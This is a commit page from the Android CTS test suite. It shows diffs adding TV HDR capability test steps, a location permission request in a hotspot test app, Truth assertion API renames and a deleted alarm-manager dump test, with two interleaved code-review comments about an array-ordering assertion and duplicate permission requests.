author | android-build-team Robot <android-build-team-robot@google.com> | 2021-03-18 20:16:54 +0000 |
---|---|---|
committer | android-build-team Robot <android-build-team-robot@google.com> | 2021-03-18 20:16:54 +0000 |
commit | 15a0ff416e9dde3748289755c371596ceb95abe1 (patch) | |
tree | ff0ad2abd6756b4f87b43de7d642109cf9c0d14b | |
parent | 58f78e015df18e4c56cc02559889506240636376 (diff) | |
parent | 142075e927c209bd54b4e6329386eb749bd5d097 (diff) | |
download | cts-android11-mainline-cellbroadcast-release.tar.gz |
Snap for 7218917 from 142075e927c209bd54b4e6329386eb749bd5d097 to mainline-cellbroadcast-release android-mainline-11.0.0_r37 android-mainline-11.0.0_r26 android11-mainline-cellbroadcast-release
Change-Id: I0fbedcc7b070e620e2babd4238f3f79f0df085e0
213 files changed, 6512 insertions, 936 deletions
diff --git a/apps/CtsVerifier/src/com/android/cts/verifier/tv/display/DisplayHdrCapabilitiesTestActivity.java b/apps/CtsVerifier/src/com/android/cts/verifier/tv/display/DisplayHdrCapabilitiesTestActivity.java
index 72a34baddb5..3eab9f42541 100644
--- a/apps/CtsVerifier/src/com/android/cts/verifier/tv/display/DisplayHdrCapabilitiesTestActivity.java
+++ b/apps/CtsVerifier/src/com/android/cts/verifier/tv/display/DisplayHdrCapabilitiesTestActivity.java
@@ -75,6 +75,140 @@ public class DisplayHdrCapabilitiesTestActivity extends TvAppVerifierActivity { mTestSequence.init(); } + private static class NonHdrDisplayTestStep extends SyncTestStep { + + public NonHdrDisplayTestStep(TvAppVerifierActivity context) { + super( + context, + R.string.tv_hdr_capabilities_test_step_non_hdr_display, + getInstructionText(context), + getButtonStringId()); + } + + private static String getInstructionText(Context context) { + return context.getString( + R.string.tv_hdr_connect_no_hdr_display, context.getString(getButtonStringId())); + } + + private static @StringRes int getButtonStringId() { + return R.string.tv_start_test; + } + + @Override + public void runTest() { + DisplayManager displayManager = mContext.getSystemService(DisplayManager.class); + Display display = displayManager.getDisplay(Display.DEFAULT_DISPLAY); + getAsserter().withMessage("Display.isHdr()").that(display.isHdr()).isFalse(); + getAsserter() + .withMessage("Display.getHdrCapabilities()") + .that(display.getHdrCapabilities().getSupportedHdrTypes()) + .isEmpty(); + } + } + + private static class HdrDisplayTestStep extends SyncTestStep { + + public HdrDisplayTestStep(TvAppVerifierActivity context) { + super( + context, + R.string.tv_hdr_capabilities_test_step_hdr_display, + getInstructionText(context), + getButtonStringId()); + } + + private static String getInstructionText(Context context) { + return context.getString( + R.string.tv_hdr_connect_hdr_display, context.getString(getButtonStringId())); + } + + private static @StringRes int getButtonStringId() { + return R.string.tv_start_test; + } + + @Override + public void runTest() { + DisplayManager displayManager = mContext.getSystemService(DisplayManager.class); + Display display = displayManager.getDisplay(Display.DEFAULT_DISPLAY); + + getAsserter().withMessage("Display.isHdr()").that(display.isHdr()).isTrue(); + + Display.HdrCapabilities hdrCapabilities = display.getHdrCapabilities(); + + int[] supportedHdrTypes 
= hdrCapabilities.getSupportedHdrTypes(); + Arrays.sort(supportedHdrTypes); + + getAsserter() + .withMessage("Display.getHdrCapabilities().getSupportedTypes()") + .that(supportedHdrTypes) + .isEqualTo( + new int[] { + Display.HdrCapabilities.HDR_TYPE_DOLBY_VISION, + Display.HdrCapabilities.HDR_TYPE_HDR10, + Display.HdrCapabilities.HDR_TYPE_HDR10_PLUS, + Display.HdrCapabilities.HDR_TYPE_HLG + }); + + float maxLuminance = hdrCapabilities.getDesiredMaxLuminance(); + getAsserter() + .withMessage("Display.getHdrCapabilities().getDesiredMaxLuminance()") + .that(maxLuminance) + .isIn(Range.openClosed(0f, MAX_EXPECTED_LUMINANCE)); + + float minLuminance = hdrCapabilities.getDesiredMinLuminance(); + getAsserter() + .withMessage("Display.getHdrCapabilities().getDesiredMinLuminance()") + .that(minLuminance) + .isIn(Range.closedOpen(0f, MAX_EXPECTED_LUMINANCE)); + + getAsserter() + .withMessage("Display.getHdrCapabilities().getDesiredMaxAverageLuminance()") + .that(hdrCapabilities.getDesiredMaxAverageLuminance()) + .isIn(Range.openClosed(minLuminance, maxLuminance)); + } + } + + private static class NoDisplayTestStep extends AsyncTestStep { + public NoDisplayTestStep(TvAppVerifierActivity context) { + super( + context, + R.string.tv_hdr_capabilities_test_step_no_display, + getInstructionText(context), + getButtonStringId()); + } + + private static String getInstructionText(Context context) { + return context.getString( + R.string.tv_hdr_disconnect_display, + context.getString(getButtonStringId()), + DISPLAY_DISCONNECT_WAIT_TIME_SECONDS, + DISPLAY_DISCONNECT_WAIT_TIME_SECONDS + 1); + } + + private static @StringRes int getButtonStringId() { + return R.string.tv_start_test; + } + + @Override + public void runTestAsync() { + // Wait for the user to disconnect the display. 
+ final long delay = Duration.ofSeconds(DISPLAY_DISCONNECT_WAIT_TIME_SECONDS).toMillis(); + mContext.getPostTarget().postDelayed(this::runTest, delay); + } + + private void runTest() { + try { + // Verify the display APIs do not crash when the display is disconnected + DisplayManager displayManager = mContext.getSystemService(DisplayManager.class); + Display display = displayManager.getDisplay(Display.DEFAULT_DISPLAY); + display.isHdr(); + display.getHdrCapabilities(); + } catch (Exception e) { + getAsserter().withMessage(Throwables.getStackTraceAsString(e)).fail(); + } + done(); + } + } + private static class TvPanelReportedTypesAreSupportedTestStep extends YesNoTestStep { public TvPanelReportedTypesAreSupportedTestStep(TvAppVerifierActivity context) { super(context, getInstructionText(context), R.string.tv_yes, R.string.tv_no); diff --git a/apps/hotspot/AndroidManifest.xml b/apps/hotspot/AndroidManifest.xml index 277be5fa117..fd8b04593b3 100644 --- a/apps/hotspot/AndroidManifest.xml +++ b/apps/hotspot/AndroidManifest.xml @@ -5,6 +5,7 @@ <uses-permission android:name="android.permission.CHANGE_WIFI_STATE" /> <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" /> <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" /> + <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" /> <application> <activity android:name=".MainActivity"> <intent-filter> diff --git a/apps/hotspot/src/com/android/cts/hotspot/MainActivity.java b/apps/hotspot/src/com/android/cts/hotspot/MainActivity.java index 2e0ed876e7d..eb815637182 100644 --- a/apps/hotspot/src/com/android/cts/hotspot/MainActivity.java +++ b/apps/hotspot/src/com/android/cts/hotspot/MainActivity.java 
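Review bot: In HdrDisplayTestStep.runTest the expected array is written in name order (`HDR_TYPE_HDR10_PLUS` before `HDR_TYPE_HLG`) while the actual array goes through `Arrays.sort`, so the comparison only holds if the constants' numeric order matches that spelling. As far as I know `HDR_TYPE_HLG` is 3 and `HDR_TYPE_HDR10_PLUS` is 4, which would make this assertion fail on a display that reports all four types. Building the expected array into a local and calling `Arrays.sort(expectedHdrTypes);` on it, or listing it in numeric order, removes the dependence on the constant values. The in-place sort also runs on the array returned by `getSupportedHdrTypes()`; if that is the capabilities object's own array rather than a copy, sorting `getSupportedHdrTypes().clone()` avoids mutating it. Separately, NoDisplayTestStep.runTest dereferences `display` without a null check, so a null from `getDisplay` while the display is unplugged would be reported as a crash of the HDR APIs.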
@@ -16,5 +16,11 @@ public class MainActivity extends Activity { ActivityCompat.requestPermissions( this, new String[] {Manifest.permission.ACCESS_COARSE_LOCATION}, 2); } + + if (ActivityCompat.checkSelfPermission(this, Manifest.permission.ACCESS_FINE_LOCATION) + != PackageManager.PERMISSION_GRANTED) { + ActivityCompat.requestPermissions( + this, new String[] {Manifest.permission.ACCESS_FINE_LOCATION}, 2); + } } } diff --git a/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/RetryRuleTest.java b/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/RetryRuleTest.java index 571a1b822ea..5a6a5efdfad 100644 --- a/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/RetryRuleTest.java +++ b/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/RetryRuleTest.java @@ -118,7 +118,7 @@ public class RetryRuleTest { new RetryableStatement<RetryableException>(3, sRetryableException, cleaner), mDescription).evaluate()); - assertThat(actualException).isSameAs(sRetryableException); + assertThat(actualException).isSameInstanceAs(sRetryableException); verify(cleaner, times(2)).run(); } @@ -143,7 +143,7 @@ public class RetryRuleTest { final RetryableException actualException = expectThrows(RetryableException.class, () -> rule.apply(mMockStatement, mDescription).evaluate()); - assertThat(actualException).isSameAs(exception); + assertThat(actualException).isSameInstanceAs(exception); verify(mMockStatement, times(1)).evaluate(); verify(cleaner, never()).run(); } @@ -169,7 +169,7 @@ public class RetryRuleTest { () -> rule.apply(new RetryableStatement<RetryableException>(2, sRetryableException), mDescription).evaluate()); - assertThat(actualException).isSameAs(sRetryableException); + assertThat(actualException).isSameInstanceAs(sRetryableException); } @Test 
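Review bot: The new fine-location block issues a second `ActivityCompat.requestPermissions` call with the same request code `2` right after the coarse-location request in the context lines above it, so when both permissions are missing the second call arrives while the first prompt is still pending. The platform handles one permission request per activity at a time, so the second request is likely to come back with an empty result and `ACCESS_FINE_LOCATION` is never prompted on first launch. Requesting both in one call, `new String[] {Manifest.permission.ACCESS_COARSE_LOCATION, Manifest.permission.ACCESS_FINE_LOCATION}`, whenever either check fails avoids that and gives the user a single location prompt. The enclosing method begins outside the hunk, so whether a result callback tells the two requests apart is not visible here.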
@@ -190,7 +190,7 @@ public class RetryRuleTest { final RetryableException actualException = expectThrows(RetryableException.class, () -> rule.apply(mMockStatement, mDescription).evaluate()); - assertThat(actualException).isSameAs(exception); + assertThat(actualException).isSameInstanceAs(exception); verify(mMockStatement, times(1)).evaluate(); } @@ -203,7 +203,7 @@ public class RetryRuleTest { final RuntimeException actualException = expectThrows(RuntimeException.class, () -> rule.apply(mMockStatement, mDescription).evaluate()); - assertThat(actualException).isSameAs(exception); + assertThat(actualException).isSameInstanceAs(exception); verify(mMockStatement, times(1)).evaluate(); } } diff --git a/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/SafeCleanerRuleTest.java b/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/SafeCleanerRuleTest.java index a56d7b28569..9c82a1e0259 100644 --- a/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/SafeCleanerRuleTest.java +++ b/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/SafeCleanerRuleTest.java @@ -75,7 +75,7 @@ public class SafeCleanerRuleTest { final SafeCleanerRule rule = new SafeCleanerRule(); final Throwable actualException = expectThrows(RuntimeException.class, () -> rule.apply(new FailureStatement(mRuntimeException), mDescription).evaluate()); - assertThat(actualException).isSameAs(mRuntimeException); + assertThat(actualException).isSameInstanceAs(mRuntimeException); } @Test 
@@ -83,7 +83,7 @@ public class SafeCleanerRuleTest { final SafeCleanerRule rule = new SafeCleanerRule().setDumper(mDumper); final Throwable actualException = expectThrows(RuntimeException.class, () -> rule.apply(new FailureStatement(mRuntimeException), mDescription).evaluate()); - assertThat(actualException).isSameAs(mRuntimeException); + assertThat(actualException).isSameInstanceAs(mRuntimeException); verify(mDumper).dump("Whatever", actualException); } @@ -94,7 +94,7 @@ public class SafeCleanerRuleTest { .add(mGoodGuyExtraExceptions1); final Throwable actualException = expectThrows(RuntimeException.class, () -> rule.apply(new FailureStatement(mRuntimeException), mDescription).evaluate()); - assertThat(actualException).isSameAs(mRuntimeException); + assertThat(actualException).isSameInstanceAs(mRuntimeException); verify(mGoodGuyRunner1).run(); verify(mGoodGuyExtraExceptions1).call(); } @@ -107,7 +107,7 @@ public class SafeCleanerRuleTest { .add(mGoodGuyExtraExceptions1); final Throwable actualException = expectThrows(RuntimeException.class, () -> rule.apply(new FailureStatement(mRuntimeException), mDescription).evaluate()); - assertThat(actualException).isSameAs(mRuntimeException); + assertThat(actualException).isSameInstanceAs(mRuntimeException); verify(mGoodGuyRunner1).run(); verify(mGoodGuyExtraExceptions1).call(); verify(mDumper).dump("Whatever", actualException); @@ -122,7 +122,7 @@ public class SafeCleanerRuleTest { .add(mGoodGuyExtraExceptions1); final Throwable actualException = expectThrows(RuntimeException.class, () -> rule.apply(mGoodGuyStatement, mDescription).evaluate()); - assertThat(actualException).isSameAs(mRuntimeException); + assertThat(actualException).isSameInstanceAs(mRuntimeException); verify(mGoodGuyRunner1).run(); verify(mGoodGuyRunner2).run(); verify(mGoodGuyExtraExceptions1).call(); 
@@ -140,7 +140,7 @@ public class SafeCleanerRuleTest { .add(mGoodGuyExtraExceptions1); final Throwable actualException = expectThrows(RuntimeException.class, () -> rule.apply(mGoodGuyStatement, mDescription).evaluate()); - assertThat(actualException).isSameAs(mRuntimeException); + assertThat(actualException).isSameInstanceAs(mRuntimeException); verify(mGoodGuyRunner1).run(); verify(mGoodGuyRunner2).run(); verify(mGoodGuyExtraExceptions1).call(); @@ -156,7 +156,7 @@ public class SafeCleanerRuleTest { .run(mGoodGuyRunner2); final Throwable actualException = expectThrows(RuntimeException.class, () -> rule.apply(mGoodGuyStatement, mDescription).evaluate()); - assertThat(actualException).isSameAs(mRuntimeException); + assertThat(actualException).isSameInstanceAs(mRuntimeException); verify(mGoodGuyRunner1).run(); verify(mGoodGuyRunner2).run(); verify(mGoodGuyExtraExceptions1).call(); @@ -173,7 +173,7 @@ public class SafeCleanerRuleTest { .run(mGoodGuyRunner2); final Throwable actualException = expectThrows(RuntimeException.class, () -> rule.apply(mGoodGuyStatement, mDescription).evaluate()); - assertThat(actualException).isSameAs(mRuntimeException); + assertThat(actualException).isSameInstanceAs(mRuntimeException); verify(mGoodGuyRunner1).run(); verify(mGoodGuyRunner2).run(); verify(mGoodGuyExtraExceptions1).call(); @@ -189,7 +189,7 @@ public class SafeCleanerRuleTest { .run(mGoodGuyRunner2); final Throwable actualException = expectThrows(RuntimeException.class, () -> rule.apply(mGoodGuyStatement, mDescription).evaluate()); - assertThat(actualException).isSameAs(mRuntimeException); + assertThat(actualException).isSameInstanceAs(mRuntimeException); verify(mGoodGuyRunner1).run(); verify(mGoodGuyRunner2).run(); verify(mGoodGuyExtraExceptions1).call(); 
diff --git a/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/StateChangerRuleTest.java b/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/StateChangerRuleTest.java index 9b1851e5c6b..7559ddcf586 100644 --- a/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/StateChangerRuleTest.java +++ b/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/StateChangerRuleTest.java @@ -117,7 +117,7 @@ public class StateChangerRuleTest { final RuntimeException actualException = expectThrows(RuntimeException.class, () -> rule.apply(mStatement, mDescription).evaluate()); - assertThat(actualException).isSameAs(mRuntimeException); + assertThat(actualException).isSameInstanceAs(mRuntimeException); verify(mStateManager, times(2)).get(); // Needed because of verifyNoMoreInteractions() verify(mStateManager, times(1)).set("newValue"); @@ -134,7 +134,7 @@ public class StateChangerRuleTest { final RuntimeException actualException = expectThrows(RuntimeException.class, () -> rule.apply(mStatement, mDescription).evaluate()); - assertThat(actualException).isSameAs(mRuntimeException); + assertThat(actualException).isSameInstanceAs(mRuntimeException); verify(mStateManager, never()).set(anyString()); } @@ -148,7 +148,7 @@ public class StateChangerRuleTest { final RuntimeException actualException = expectThrows(RuntimeException.class, () -> rule.apply(mStatement, mDescription).evaluate()); - assertThat(actualException).isSameAs(mRuntimeException); + assertThat(actualException).isSameInstanceAs(mRuntimeException); verify(mStateManager, times(2)).get(); // Needed because of verifyNoMoreInteractions() verify(mStateManager, times(1)).set("newValue"); 
@@ -164,7 +164,7 @@ public class StateChangerRuleTest { final RuntimeException actualException = expectThrows(RuntimeException.class, () -> rule.apply(mStatement, mDescription).evaluate()); - assertThat(actualException).isSameAs(mRuntimeException); + assertThat(actualException).isSameInstanceAs(mRuntimeException); verify(mStateManager, times(2)).get(); // Needed because of verifyNoMoreInteractions() verify(mStateManager, times(1)).set("sameValue"); diff --git a/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/StateKeeperRuleTest.java b/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/StateKeeperRuleTest.java index 4599acaebb2..becf0794f58 100644 --- a/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/StateKeeperRuleTest.java +++ b/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/StateKeeperRuleTest.java @@ -74,7 +74,7 @@ public class StateKeeperRuleTest { final RuntimeException actualException = expectThrows(RuntimeException.class, () -> rule.apply(mStatement, mDescription).evaluate()); - assertThat(actualException).isSameAs(mRuntimeException); + assertThat(actualException).isSameInstanceAs(mRuntimeException); verify(mStateManager, times(2)).get(); // Needed because of verifyNoMoreInteractions() verify(mStateManager, times(1)).set("before"); verifyNoMoreInteractions(mStateManager); // Make sure set() was not called again @@ -100,7 +100,7 @@ public class StateKeeperRuleTest { final RuntimeException actualException = expectThrows(RuntimeException.class, () -> rule.apply(mStatement, mDescription).evaluate()); - assertThat(actualException).isSameAs(mRuntimeException); + assertThat(actualException).isSameInstanceAs(mRuntimeException); verify(mStateManager, never()).set(anyString()); } 
diff --git a/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/TimeoutTest.java b/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/TimeoutTest.java index 8992d181556..fdc4de6ee92 100644 --- a/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/TimeoutTest.java +++ b/common/device-side/util-axt/tests/src/com/android/compatibility/common/util/TimeoutTest.java @@ -105,7 +105,7 @@ public class TimeoutTest { final Timeout timeout = new Timeout(mSleeper, NAME, 100, 2, 500); final Object result = new Object(); when(mJob.call()).thenReturn(result); - assertThat(timeout.run(DESC, 1, mJob)).isSameAs(result); + assertThat(timeout.run(DESC, 1, mJob)).isSameInstanceAs(result); assertThat(mSleeper.totalSleepingTime).isEqualTo(0); } @@ -114,7 +114,7 @@ public class TimeoutTest { final Timeout timeout = new Timeout(mSleeper, NAME, 100, 2, 500); final Object result = new Object(); when(mJob.call()).thenReturn((Object) null, result); - assertThat(timeout.run(DESC, 10, mJob)).isSameAs(result); + assertThat(timeout.run(DESC, 10, mJob)).isSameInstanceAs(result); assertThat(mSleeper.totalSleepingTime).isEqualTo(10); } @@ -124,7 +124,7 @@ public class TimeoutTest { final RetryableException e = expectThrows(RetryableException.class, () -> timeout.run(DESC, 10, mJob)); assertThat(e.getMessage()).contains(DESC); - assertThat(e.getTimeout()).isSameAs(timeout); + assertThat(e.getTimeout()).isSameInstanceAs(timeout); assertThat(mSleeper.totalSleepingTime).isEqualTo(100); } diff --git a/hostsidetests/appcompat/compatchanges/src/com/android/cts/appcompat/CompatChangesValidConfigTest.java b/hostsidetests/appcompat/compatchanges/src/com/android/cts/appcompat/CompatChangesValidConfigTest.java index c5e72b9c65b..8088411e290 100644 --- a/hostsidetests/appcompat/compatchanges/src/com/android/cts/appcompat/CompatChangesValidConfigTest.java 
+++ b/hostsidetests/appcompat/compatchanges/src/com/android/cts/appcompat/CompatChangesValidConfigTest.java @@ -208,7 +208,7 @@ public final class CompatChangesValidConfigTest extends CompatChangeGatingTestCa * The device may contain extra changes, but none may be removed. */ public void testDeviceContainsExpectedConfig() throws Exception { - assertThat(getOnDeviceCompatConfig()).containsAllIn(getExpectedCompatConfig()); + assertThat(getOnDeviceCompatConfig()).containsAtLeastElementsIn(getExpectedCompatConfig()); } } diff --git a/hostsidetests/appsecurity/Android.bp b/hostsidetests/appsecurity/Android.bp index 3a569dba5ab..30a6ba3a03d 100644 --- a/hostsidetests/appsecurity/Android.bp +++ b/hostsidetests/appsecurity/Android.bp @@ -40,7 +40,8 @@ java_test_host { "cts", "vts10", "general-tests", - "mts", + "mts-documentsui", + "mts-mediaprovider", "sts", ], diff --git a/hostsidetests/devicepolicy/app/IntentSender/src/com/android/cts/intent/sender/AppLinkTest.java b/hostsidetests/devicepolicy/app/IntentSender/src/com/android/cts/intent/sender/AppLinkTest.java index 1da1202b5de..eef1577579a 100644 --- a/hostsidetests/devicepolicy/app/IntentSender/src/com/android/cts/intent/sender/AppLinkTest.java +++ b/hostsidetests/devicepolicy/app/IntentSender/src/com/android/cts/intent/sender/AppLinkTest.java @@ -93,6 +93,7 @@ public class AppLinkTest extends InstrumentationTestCase { private Intent getHttpIntent() { Intent i = new Intent(Intent.ACTION_VIEW); i.addCategory(Intent.CATEGORY_BROWSABLE); + i.addCategory(Intent.CATEGORY_DEFAULT); i.setData(Uri.parse("http://com.android.cts.intent.receiver")); return i; } diff --git a/hostsidetests/devicepolicy/src/com/android/cts/devicepolicy/ManagedProfileCrossProfileTest.java b/hostsidetests/devicepolicy/src/com/android/cts/devicepolicy/ManagedProfileCrossProfileTest.java index 9873fb2f212..b9a8041e108 100644 --- a/hostsidetests/devicepolicy/src/com/android/cts/devicepolicy/ManagedProfileCrossProfileTest.java 
+++ b/hostsidetests/devicepolicy/src/com/android/cts/devicepolicy/ManagedProfileCrossProfileTest.java @@ -621,7 +621,7 @@ public class ManagedProfileCrossProfileTest extends BaseManagedProfileTest { throws Exception { Set<String> currentPids = new HashSet<>( Arrays.asList(getAppPid(packageName).split(" "))); - assertThat(currentPids).containsAllIn(pids); + assertThat(currentPids).containsAtLeastElementsIn(pids); } private void assertAppKilledInBothProfiles(String packageName, List<String> pids) diff --git a/hostsidetests/incident/src/com/android/server/cts/AlarmManagerIncidentTest.java b/hostsidetests/incident/src/com/android/server/cts/AlarmManagerIncidentTest.java deleted file mode 100644 index 8093dc36aea..00000000000 --- a/hostsidetests/incident/src/com/android/server/cts/AlarmManagerIncidentTest.java +++ /dev/null 
@@ -1,219 +0,0 @@ -/* - * Copyright (C) 2016 The Android Open Source Project - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ - -package com.android.server.cts; - -import com.android.server.AlarmClockMetadataProto; -import com.android.server.AlarmManagerServiceDumpProto; -import com.android.server.AlarmProto; -import com.android.server.BatchProto; -import com.android.server.BroadcastStatsProto; -import com.android.server.ConstantsProto; -import com.android.server.FilterStatsProto; -import com.android.server.AppStateTrackerProto; -import com.android.server.AppStateTrackerProto.RunAnyInBackgroundRestrictedPackages; -import com.android.server.IdleDispatchEntryProto; -import com.android.server.InFlightProto; -import com.android.server.WakeupEventProto; -import java.util.List; - -/** - * Test to check that the alarm manager service properly outputs its dump state. - */ -public class AlarmManagerIncidentTest extends ProtoDumpTestCase { - public void testAlarmManagerServiceDump() throws Exception { - final AlarmManagerServiceDumpProto dump = - getDump(AlarmManagerServiceDumpProto.parser(), "dumpsys alarm --proto"); - - verifyAlarmManagerServiceDumpProto(dump, PRIVACY_NONE); - } - - static void verifyAlarmManagerServiceDumpProto(AlarmManagerServiceDumpProto dump, final int filterLevel) throws Exception { - // Times should be positive. 
- assertTrue(0 < dump.getCurrentTime()); - assertTrue(0 < dump.getElapsedRealtime()); - // Can be 0 if the time hasn't been changed yet. - assertTrue(0 <= dump.getLastTimeChangeClockTime()); - assertTrue(0 <= dump.getLastTimeChangeRealtime()); - - // ConstantsProto - ConstantsProto settings = dump.getSettings(); - assertTrue(0 < settings.getMinFuturityDurationMs()); - assertTrue(0 < settings.getMinIntervalDurationMs()); - assertTrue(0 < settings.getListenerTimeoutDurationMs()); - assertTrue(0 < settings.getAllowWhileIdleShortDurationMs()); - assertTrue(0 < settings.getAllowWhileIdleLongDurationMs()); - assertTrue(0 < settings.getAllowWhileIdleWhitelistDurationMs()); - - // AppStateTrackerProto - AppStateTrackerProto appStateTracker = dump.getAppStateTracker(); - for (int uid : appStateTracker.getForegroundUidsList()) { - // 0 is technically a valid UID. - assertTrue(0 <= uid); - } - for (int aid : appStateTracker.getPowerSaveWhitelistAppIdsList()) { - assertTrue(0 <= aid); - } - for (int aid : appStateTracker.getTempPowerSaveWhitelistAppIdsList()) { - assertTrue(0 <= aid); - } - for (RunAnyInBackgroundRestrictedPackages r : appStateTracker.getRunAnyInBackgroundRestrictedPackagesList()) { - assertTrue(0 <= r.getUid()); - } - - if (!dump.getIsInteractive()) { - // These are only valid if is_interactive is false. - assertTrue(0 < dump.getTimeSinceNonInteractiveMs()); - assertTrue(0 < dump.getMaxWakeupDelayMs()); - assertTrue(0 < dump.getTimeSinceLastDispatchMs()); - // time_until_next_non_wakeup_delivery_ms could be negative if the delivery time is in the past. 
- } - - assertTrue(0 < dump.getTimeUntilNextWakeupMs()); - assertTrue(0 < dump.getTimeSinceLastWakeupMs()); - assertTrue(0 < dump.getTimeSinceLastWakeupSetMs()); - assertTrue(0 <= dump.getTimeChangeEventCount()); - - for (int aid : dump.getDeviceIdleUserWhitelistAppIdsList()) { - assertTrue(0 <= aid); - } - - // AlarmClockMetadataProto - for (AlarmClockMetadataProto ac : dump.getNextAlarmClockMetadataList()) { - assertTrue(0 <= ac.getUser()); - assertTrue(0 < ac.getTriggerTimeMs()); - } - - for (BatchProto b : dump.getPendingAlarmBatchesList()) { - final long start = b.getStartRealtime(); - final long end = b.getEndRealtime(); - assertTrue("Batch start time (" + start+ ") is negative", 0 <= start); - assertTrue("Batch end time (" + end + ") is negative", 0 <= end); - assertTrue("Batch start time (" + start + ") is after its end time (" + end + ")", - start <= end); - testAlarmProtoList(b.getAlarmsList(), filterLevel); - } - - testAlarmProtoList(dump.getPendingUserBlockedBackgroundAlarmsList(), filterLevel); - - testAlarmProto(dump.getPendingIdleUntil(), filterLevel); - - testAlarmProtoList(dump.getPendingWhileIdleAlarmsList(), filterLevel); - - testAlarmProto(dump.getNextWakeFromIdle(), filterLevel); - - testAlarmProtoList(dump.getPastDueNonWakeupAlarmsList(), filterLevel); - - assertTrue(0 <= dump.getDelayedAlarmCount()); - assertTrue(0 <= dump.getTotalDelayTimeMs()); - assertTrue(0 <= dump.getMaxDelayDurationMs()); - assertTrue(0 <= dump.getMaxNonInteractiveDurationMs()); - - assertTrue(0 <= dump.getBroadcastRefCount()); - assertTrue(0 <= dump.getPendingIntentSendCount()); - assertTrue(0 <= dump.getPendingIntentFinishCount()); - assertTrue(0 <= dump.getListenerSendCount()); - assertTrue(0 <= dump.getListenerFinishCount()); - - for (InFlightProto f : dump.getOutstandingDeliveriesList()) { - assertTrue(0 <= f.getUid()); - assertTrue(0 < f.getWhenElapsedMs()); - testBroadcastStatsProto(f.getBroadcastStats()); - testFilterStatsProto(f.getFilterStats(), filterLevel); 
- if (filterLevel == PRIVACY_AUTO) { - assertTrue(f.getTag().isEmpty()); - } - } - - for (AlarmManagerServiceDumpProto.LastAllowWhileIdleDispatch l : dump.getLastAllowWhileIdleDispatchTimesList()) { - assertTrue(0 <= l.getUid()); - assertTrue(0 < l.getTimeMs()); - } - - for (AlarmManagerServiceDumpProto.TopAlarm ta : dump.getTopAlarmsList()) { - assertTrue(0 <= ta.getUid()); - testFilterStatsProto(ta.getFilter(), filterLevel); - } - - for (AlarmManagerServiceDumpProto.AlarmStat as : dump.getAlarmStatsList()) { - testBroadcastStatsProto(as.getBroadcast()); - for (FilterStatsProto f : as.getFiltersList()) { - testFilterStatsProto(f, filterLevel); - } - } - - for (IdleDispatchEntryProto id : dump.getAllowWhileIdleDispatchesList()) { - assertTrue(0 <= id.getUid()); - assertTrue(0 <= id.getEntryCreationRealtime()); - assertTrue(0 <= id.getArgRealtime()); - if (filterLevel == PRIVACY_AUTO) { - assertTrue(id.getTag().isEmpty()); - } - } - - for (WakeupEventProto we : dump.getRecentWakeupHistoryList()) { - assertTrue(0 <= we.getUid()); - assertTrue(0 <= we.getWhen()); - } - } - - private static void testAlarmProtoList(List<AlarmProto> alarms, final int filterLevel) throws Exception { - for (AlarmProto a : alarms) { - testAlarmProto(a, filterLevel); - } - } - - private static void testAlarmProto(AlarmProto alarm, final int filterLevel) throws Exception { - assertNotNull(alarm); - - if (filterLevel == PRIVACY_AUTO) { - assertTrue(alarm.getTag().isEmpty()); - assertTrue(alarm.getListener().isEmpty()); - } - // alarm.time_until_when_elapsed_ms can be negative if 'when' is in the past. 
- assertTrue(0 <= alarm.getWindowLengthMs()); - assertTrue(0 <= alarm.getRepeatIntervalMs()); - assertTrue(0 <= alarm.getCount()); - } - - private static void testBroadcastStatsProto(BroadcastStatsProto broadcast) throws Exception { - assertNotNull(broadcast); - - assertTrue(0 <= broadcast.getUid()); - assertTrue(0 <= broadcast.getTotalFlightDurationMs()); - assertTrue(0 <= broadcast.getCount()); - assertTrue(0 <= broadcast.getWakeupCount()); - assertTrue(0 <= broadcast.getStartTimeRealtime()); - // Nesting should be non-negative. - assertTrue(0 <= broadcast.getNesting()); - } - - private static void testFilterStatsProto(FilterStatsProto filter, final int filterLevel) throws Exception { - assertNotNull(filter); - - if (filterLevel == PRIVACY_AUTO) { - assertTrue(filter.getTag().isEmpty()); - } - assertTrue(0 <= filter.getLastFlightTimeRealtime()); - assertTrue(0 <= filter.getTotalFlightDurationMs()); - assertTrue(0 <= filter.getCount()); - assertTrue(0 <= filter.getWakeupCount()); - assertTrue(0 <= filter.getStartTimeRealtime()); - // Nesting should be non-negative. - assertTrue(0 <= filter.getNesting()); - } -} - diff --git a/hostsidetests/incident/src/com/android/server/cts/IncidentdTest.java b/hostsidetests/incident/src/com/android/server/cts/IncidentdTest.java index a2622095684..5b74593705c 100644 --- a/hostsidetests/incident/src/com/android/server/cts/IncidentdTest.java +++ b/hostsidetests/incident/src/com/android/server/cts/IncidentdTest.java @@ -69,8 +69,6 @@ public class IncidentdTest extends ProtoDumpTestCase { ActivityManagerIncidentTest.verifyActivityManagerServiceDumpProcessesProto(dump.getAmprocesses(), filterLevel); - AlarmManagerIncidentTest.verifyAlarmManagerServiceDumpProto(dump.getAlarm(), filterLevel); - // GraphicsStats is expected to be all AUTOMATIC. 